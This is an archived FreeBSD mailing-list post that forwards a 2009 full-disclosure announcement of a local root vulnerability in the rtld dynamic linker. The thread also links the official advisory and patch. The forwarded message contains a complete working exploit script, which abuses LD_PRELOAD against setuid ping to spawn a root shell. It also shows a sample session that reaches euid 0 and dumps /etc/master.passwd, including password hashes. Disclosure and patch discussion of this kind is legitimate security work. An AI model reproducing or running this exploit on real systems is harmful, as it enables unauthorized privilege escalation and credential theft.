Fwd: ** FreeBSD local r00t zeroday

Daniel Molina Wegener dmw at coder.cl
Wed Dec 2 01:44:58 UTC 2009 

On Tuesday 01 December 2009,
jorge at betazeta.com wrote:

> I confirmed this.

  Oh... I've seen this today at 09:20, sorry for the late
answer, I'm suscribed to the freebsd-hackers and freebsd-current
mailing lists ;)

------8<------
On Tue, Dec 01, 2009 at 06:04:05PM +0700, ~Lst wrote:
> Hello all,
> 
> What d'you think about this ?
> http://seclists.org/fulldisclosure/2009/Nov/371

Are you actually asking for an opinions of a security hole, or are you
just trying to bring it to our attention?  An official statement was
already issued to freebsd-security about 10 hours ago:

http://lists.freebsd.org/pipermail/freebsd-security/2009-December/005369.html

The mentioned patch is for src/libexec/rtld-elf/rtld.c (since full paths
aren't present in the patch file).

Mentioned patch has already been committed to the HEAD (CURRENT),
RELENG_7, and RELENG_8 branches approximately 8.75 hours ago, with the
note "Advisory coming soon":

http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/rtld-elf/rtld.c
------8<------

> 
> ---------- Forwarded message ----------
> From: Kingcope &lt;kcope2 at googlemail.com&gt;
> Date: 2009/11/30
> Subject: ** FreeBSD local r00t zeroday
> To: full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com
> 
> 
> ** FreeBSD local r00t 0day
> Discovered &amp; Exploited by Nikolaos Rangos also known as Kingcope.
> Nov 2009 "BiG TiME"
> 
> "Go fetch your FreeBSD r00tkitz" //
>  http://www.youtube.com/watch?v=dDnhthI27Fg
> 
> There is an unbelievable simple local r00t bug in recent FreeBSD versions.
> I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.
> 
> The bug resides in the Run-Time Link-Editor (rtld).
> Normally rtld does not allow dangerous environment variables like
>  LD_PRELOAD to be set when executing setugid binaries like "ping" or "su".
> With a rather simple technique rtld can be tricked into
> accepting LD variables even on setugid binaries.
> See the attached exploit for details.
> 
> Example exploiting session
> **********************************
> %uname -a;id;
> FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
> 15:48:17 UTC 2009
> root at almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC &nbsp;i386
> uid=1001(kcope) gid=1001(users) groups=1001(users)
> %./w00t.sh
> FreeBSD local r00t zeroday
> by Kingcope
> November 2009
> env.c: In function 'main':
> env.c:5: warning: incompatible implicit declaration of built-in
> function 'malloc'
> env.c:9: warning: incompatible implicit declaration of built-in
> function 'strcpy'
> env.c:11: warning: incompatible implicit declaration of built-in
> function 'execl'
> /libexec/ld-elf.so.1: environment corrupt; missing value for
> /libexec/ld-elf.so.1: environment corrupt; missing value for
> /libexec/ld-elf.so.1: environment corrupt; missing value for
> /libexec/ld-elf.so.1: environment corrupt; missing value for
> /libexec/ld-elf.so.1: environment corrupt; missing value for
> /libexec/ld-elf.so.1: environment corrupt; missing value for
> ALEX-ALEX
> # uname -a;id;
> FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
> 15:48:17 UTC 2009
> root at almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC &nbsp;i386
> uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
> # cat /etc/master.passwd
> # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
> kensmith Exp $
> #
> root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie
>  &amp;:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root:
> daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
> operator:*:2:5::0:0:System &amp;:/:/usr/sbin/nologin
> bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
> tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
> kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
> games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
> news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
> man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> smmsp:*:25:25::0:0:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> mailnull:*:26:26::0:0:Sendmail Default
>  User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53::0:0:Bind
>  Sandbox:/:/usr/sbin/nologin
> proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
> _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
> _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
> uucp:*:66:66::0:0:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
> www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
> kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
> &amp;:/home/kcope:/bin/sh
> #
> 
> Systems tested/affected
> **********************************
> FreeBSD 8.0-RELEASE *** VULNERABLE
> FreeBSD 7.1-RELEASE *** VULNERABLE
> FreeBSD 6.3-RELEASE *** NOT VULN
> FreeBSD 4.9-RELEASE *** NOT VULN
> 
> *EXPLOIT*
> 
> #!/bin/sh
> echo ** FreeBSD local r00t zeroday
> echo by Kingcope
> echo November 2009
> cat &gt; env.c &lt;&lt; _EOF
> #include &lt;stdio.h&gt;
> 
> main() {
>  &nbsp; &nbsp; &nbsp; &nbsp;extern char **environ;
>  &nbsp; &nbsp; &nbsp; &nbsp;environ = (char**)malloc(8096);
> 
>  &nbsp; &nbsp; &nbsp; &nbsp;environ[0] = (char*)malloc(1024);
>  &nbsp; &nbsp; &nbsp; &nbsp;environ[1] = (char*)malloc(1024);
>  &nbsp; &nbsp; &nbsp; &nbsp;strcpy(environ[1],
>  "LD_PRELOAD=/tmp/w00t.so.1.0");
> 
>  &nbsp; &nbsp; &nbsp; &nbsp;execl("/sbin/ping", "ping", 0);
> }
> _EOF
> gcc env.c -o env
> cat &gt; program.c &lt;&lt; _EOF
> #include &lt;unistd.h&gt;
> #include &lt;stdio.h&gt;
> #include &lt;sys/types.h&gt;
> #include &lt;stdlib.h&gt;
> 
> void _init() {
>  &nbsp; &nbsp; &nbsp; &nbsp;extern char **environ;
>  &nbsp; &nbsp; &nbsp; &nbsp;environ=NULL;
>  &nbsp; &nbsp; &nbsp; &nbsp;system("echo ALEX-ALEX;/bin/sh");
> }
> _EOF
> gcc -o program.o -c program.c -fPIC
> gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
> cp w00t.so.1.0 /tmp/w00t.so.1.0
> ./env
> 

Best regards,
-- 
| Daniel Molina Wegener <dmw [at] coder [dot] cl> |
| IT Consulting & Software Developer              |
| http://coder.cl/                                |
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 835 bytes
Desc: This is a digitally signed message part.
Url : http://lists.freebsd.org/pipermail/freebsd-bugs/attachments/20091202/b078c93e/attachment.pgp

More information about the freebsd-bugs mailing list